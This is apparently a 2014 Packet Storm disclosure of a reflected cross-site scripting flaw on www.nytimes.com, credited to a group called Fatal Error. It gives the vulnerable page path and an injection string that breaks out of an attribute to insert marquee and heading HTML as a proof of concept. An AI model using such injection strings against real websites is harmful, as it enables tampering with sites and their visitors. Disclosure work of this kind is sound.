New York Times Cross Site Scripting

2014-02-26T00:00:00
ID PACKETSTORM:125411
Type packetstorm
Reporter s4r4d0
Modified 2014-02-26T00:00:00

Description

                                        
                                            `================================================================================  
Cross Site Scripting on New York Times  
================================================================================  
# Site: www.nytimes.com  
  
# Date: 25/02/2014  
  
# Author: s4r4d0  
  
# Contact: s4r4d0[at]yahoo[dot]com  
  
# Team: Fatal Error  
  
# Twitter: @FatalErrorSec  
  
# Made in Brazil  
================================================================================  
[~] PoC :  
  
# Site: www.nytimes.com  
  
# File: /2001/09/23/nyregion/one-family-two-horror-stories.html%3fpagewanted=  
  
# XSS: ">><marquee><h1>XSS By Fatal Error</h1><marquee>  
  
===============================================================================  
`